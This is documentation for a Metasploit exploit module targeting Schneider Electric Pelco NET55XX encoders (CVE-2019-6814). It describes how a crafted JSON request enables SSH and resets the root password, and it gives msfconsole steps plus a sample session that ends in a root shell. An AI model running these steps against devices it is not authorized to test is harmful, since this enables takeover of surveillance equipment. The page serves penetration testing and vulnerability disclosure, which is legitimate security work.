metasploit-gs/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md
2019-07-22 12:28:47 -05:00

Vulnerable Application

Schneider Electric Pelco NET55XX Encoder (CVE-2019-6814)

This module targets Schneider Electric Pelco NET55XX encoders (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550). It exploits an inadequate access control vulnerability by sending a malicious JSON request to the encoder's web UI, which enables the SSH service and changes the root password.

Verification Steps

  • Start msfconsole
  • use exploit/unix/http/schneider_electric_net55xx_encoder
  • set RHOSTS [rhosts]
  • set RPORT [rport]
  • set NEW_PASSWORD [new password]
  • exploit
  • Verify you get a root shell

Options

In the simplest case, set the RHOSTS and NEW_PASSWORD options and the module is ready to run.

NEW_PASSWORD

The new SSH password to set for the root account on the vulnerable device.

Scenarios

Schneider Electric Pelco Encoder NET5501-XT

msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2
RHOSTS => 192.168.34.2
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80
RPORT => 80
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7
NEW_PASSWORD => msfrapid7
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run

[*] 192.168.34.2:22 - Attempt to start a SSH connection...
[*] 192.168.34.2:80 - Attempt to change the root password...
[+] 192.168.34.2:80 - Successfully changed the root password...
[+] 192.168.34.2:22 - Session established
[*] Found shell.
[*] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400

uname -a;id
Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown
uid=0(root) gid=0(root) groups=0(root)